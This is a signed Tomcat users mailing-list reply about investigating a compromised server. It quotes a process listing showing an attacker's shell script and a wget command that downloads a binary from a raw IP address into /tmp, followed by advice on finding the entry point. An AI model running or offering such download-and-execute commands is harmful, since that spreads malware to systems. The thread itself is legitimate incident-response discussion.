-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Konstantin,
On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini > <lsantagost...@gmail.com>: >> Hello Dan, >> >> Nop, the attacker is executing locally the following >> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget >> http://218.199.102.59/.xy/squid32 -O /tmp/squid >> >> And the launch squid who tries to connect via ssh to varoius >> places. >> >> Right now its time to leave the office, but in a few hours i will >> paste in pastebin access logs, config files, wherever you tell >> me. >> >> This is my pstree >> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd >> ├─java─┬─sh───wget │ └─263*[{java}] > > sh launched by tomcat's java? Yes: please verify that it's the JVM running Tomcat, and not just any JVM process. > Take a thread dump: > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F > > It shall show what is stacktrace in thread that launched external > process. +1 The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it. A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly secured with a password, etc. - -chris -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12 lvJcfOhzHLwo07Pv+y3J =EiX9 -----END PGP SIGNATURE----- --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org